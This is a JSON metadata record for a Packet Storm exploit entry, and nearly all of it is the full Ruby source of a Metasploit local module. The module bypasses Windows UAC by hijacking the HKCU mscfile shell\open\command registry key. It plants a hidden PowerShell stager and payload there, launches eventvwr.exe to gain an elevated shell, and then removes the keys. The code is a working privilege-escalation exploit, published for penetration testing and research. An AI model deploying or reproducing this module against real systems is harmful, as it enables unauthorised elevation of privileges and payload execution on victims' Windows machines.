{"id": "PACKETSTORM:139992", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Windows Escalate UAC Protection Bypass", "description": "", "published": "2016-12-02T00:00:00", "modified": "2016-12-02T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/139992/Windows-Escalate-UAC-Protection-Bypass.html", "reporter": "Matt Graeber", "references": [], "cvelist": [], "lastseen": "2016-12-02T04:47:32", "viewCount": 37, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/139992/bypassuac_eventvwr.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Exploit::Powershell \ninclude Post::Windows::Priv \ninclude Post::Windows::Registry \ninclude Post::Windows::Runas \n \nEVENTVWR_DEL_KEY = \"HKCU\\\\Software\\\\Classes\\\\mscfile\" \nEVENTVWR_WRITE_KEY = \"HKCU\\\\Software\\\\Classes\\\\mscfile\\\\shell\\\\open\\\\command\" \nEXEC_REG_VAL = '' # This maps to \"(Default)\" \nEXEC_REG_VAL_TYPE = 'REG_SZ' \nEVENTVWR_PATH = \"%WINDIR%\\\\System32\\\\eventvwr.exe\" \nPSH_PATH = \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\" \nCMD_MAX_LEN = 2081 \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)', \n'Description' => %q{ \nThis module will bypass Windows UAC by hijacking a special key in the Registry under \nthe current user hive, and inserting a custom command that will get invoked when \nthe Windows Event Viewer is launched. It will spawn a second shell that has the UAC \nflag turned off. \n \nThis module modifies a registry key, but cleans up the key once the payload has \nbeen invoked. \n \nThe module does not require the architecture of the payload to match the OS. If \nspecifying EXE::Custom your DLL should call ExitProcess() after starting your \npayload in a separate process. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Matt Nelson', # UAC bypass discovery and research \n'Matt Graeber', # UAC bypass discovery and research \n'OJ Reeves' # MSF module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Targets' => [ \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ] \n], \n'DefaultTarget' => 0, \n'References' => [ \n[ \n'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/', \n'URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1' \n] \n], \n'DisclosureDate'=> 'Aug 15 2016' \n)) \nend \n \ndef check \nif sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled? \nExploit::CheckCode::Appears \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncommspec = '%COMSPEC%' \nregistry_view = REGISTRY_VIEW_NATIVE \n \n# Make sure we have a sane payload configuration \n \nif sysinfo['Architecture'] == ARCH_X64 \n# On x64, check arch \nif session.arch == ARCH_X86 \n# running WOW64, map the correct registry view \nregistry_view = REGISTRY_VIEW_64_BIT \n \nif target_arch.first == ARCH_X64 \n# we have an x64 payload specified while using WOW64, so we need to \n# move over to sysnative \ncommspec = '%WINDIR%\\\\Sysnative\\\\cmd.exe' \nelse \n# Else, we're 32-bit payload, so need to ref wow64. \ncommspec = '%WINDIR%\\\\SysWOW64\\\\cmd.exe' \nend \nelsif target_arch.first == ARCH_X86 \n# We're x64, but invoking x86, so switch to SysWOW64 \ncommspec = '%WINDIR%\\\\SysWOW64\\\\cmd.exe' \nend \nelse \n# if we're on x86, we can't handle x64 payloads \nif target_arch.first == ARCH_X64 \nfail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') \nend \nend \n \n# Validate that we can actually do things before we bother \n# doing any more work \ncheck_permissions! \n \ncase get_uac_level \nwhen UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, \nUAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, \nUAC_PROMPT_CREDS, UAC_PROMPT_CONSENT \nfail_with(Failure::NotVulnerable, \n\"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\" \n) \nwhen UAC_DEFAULT \nprint_good('UAC is set to Default') \nprint_good('BypassUAC can bypass this setting, continuing...') \nwhen UAC_NO_PROMPT \nprint_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead') \nshell_execute_exe \nreturn \nend \n \npayload_value = rand_text_alpha(8) \npsh_path = expand_path(\"#{PSH_PATH}\") \n \ntemplate_path = Rex::Powershell::Templates::TEMPLATE_DIR \npsh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) \n \npsh_stager = \"\\\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\\\"\" \ncmd = \"#{psh_path} -nop -w hidden -c #{psh_stager}\" \n \nexisting = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || \"\" \n \nif existing.empty? \nregistry_createkey(EVENTVWR_WRITE_KEY, registry_view) \nend \n \nprint_status(\"Configuring payload and stager registry keys ...\") \nregistry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) \nregistry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) \n \n# We can't invoke EventVwr.exe directly because CreateProcess fails with the \n# dreaded 740 error (Program requires elevation). Instead, we must invoke \n# cmd.exe and use that to fire off the binary. \ncmd_path = expand_path(commspec) \ncmd_args = expand_path(\"/c #{EVENTVWR_PATH}\") \nprint_status(\"Executing payload: #{cmd_path} #{cmd_args}\") \n \n# We can't use cmd_exec here because it blocks, waiting for a result. \nclient.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true}) \n \n# Wait a copule of seconds to give the payload a chance to fire before cleaning up \n# TODO: fix this up to use something smarter than a timeout? \nRex::sleep(5) \n \nhandler(client) \n \nprint_status(\"Cleaining up registry keys ...\") \nif existing.empty? \nregistry_deletekey(EVENTVWR_DEL_KEY, registry_view) \nelse \nregistry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) \nregistry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view) \nend \n \nend \n \ndef check_permissions! \nfail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? \n \n# Check if you are an admin \nvprint_status('Checking admin status...') \nadmin_group = is_in_admin_group? \n \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, \"Target is not vulnerable.\") \nend \n \nunless is_in_admin_group? \nfail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') \nend \n \nprint_status('UAC is Enabled, checking level...') \nif admin_group.nil? \nprint_error('Either whoami is not there or failed to execute') \nprint_error('Continuing under assumption you already checked...') \nelse \nif admin_group \nprint_good('Part of Administrators group! Continuing...') \nelse \nfail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') \nend \nend \n \nif get_integrity_level == INTEGRITY_LEVEL_SID[:low] \nfail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') \nend \nend \nend \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645288671, "score": 1659770509}}